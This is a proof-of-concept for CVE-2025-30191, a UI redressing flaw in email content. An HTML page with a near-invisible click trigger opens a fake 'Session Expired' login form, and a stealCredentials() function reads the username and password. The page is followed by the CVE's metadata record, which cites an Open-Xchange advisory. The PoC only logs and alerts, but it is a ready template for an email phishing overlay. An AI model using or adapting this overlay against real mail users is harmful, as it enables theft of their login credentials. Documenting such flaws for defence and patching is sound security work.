CVE-2025-30191

<!-- CVE-2025-30191 PoC: UI Redressing Attack via Malicious Email --> <!-- This PoC demonstrates the UI redressing attack vector --> <!-- In real attack, this would be embedded in email content --> <!DOCTYPE html> <html> <head> <style> /* Malicious overlay styles */ .overlay-container { position: relative; } .fake-login { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(255, 255, 255, 0.95); border: 2px solid #ccc; border-radius: 5px; padding: 20px; z-index: 9999; display: none; } .fake-login input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 3px; } .fake-login button { width: 100%; padding: 10px; background: #0066cc; color: white; border: none; border-radius: 3px; cursor: pointer; } .trigger-element { opacity: 0.01; position: absolute; width: 100%; height: 100%; cursor: pointer; } </style> </head> <body> <div class="overlay-container"> <!-- Legitimate looking email content --> <h1>Important Message</h1> <p>Please review your account settings.</p> <!-- Hidden fake login form --> <div class="fake-login" id="fakeLogin"> <h3>Session Expired - Please Login Again</h3> <input type="text" placeholder="Username" id="username"> <input type="password" placeholder="Password" id="password"> <button onclick="stealCredentials()">Login</button> </div> <!-- Invisible trigger element --> <div class="trigger-element" onclick="showFakeLogin()"></div> </div> <script> function showFakeLogin() { document.getElementById('fakeLogin').style.display = 'block'; } function stealCredentials() { var user = document.getElementById('username').value; var pass = document.getElementById('password').value; // In real attack, credentials would be exfiltrated console.log('Stolen credentials: ' + user + ':' + pass); alert('Credentials captured!'); } </script> </body> </html>

{"cve": {"id": "CVE-2025-30191", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:47.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content from E-Mail can be used to perform a redressing attack. Users can be tricked to perform unintended actions or provide sensitive information to a third party which would enable further threats. Attribute values containing HTML fragments are now denied by the sanitization procedure. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0002.json", "source": "[email protected]"}]}}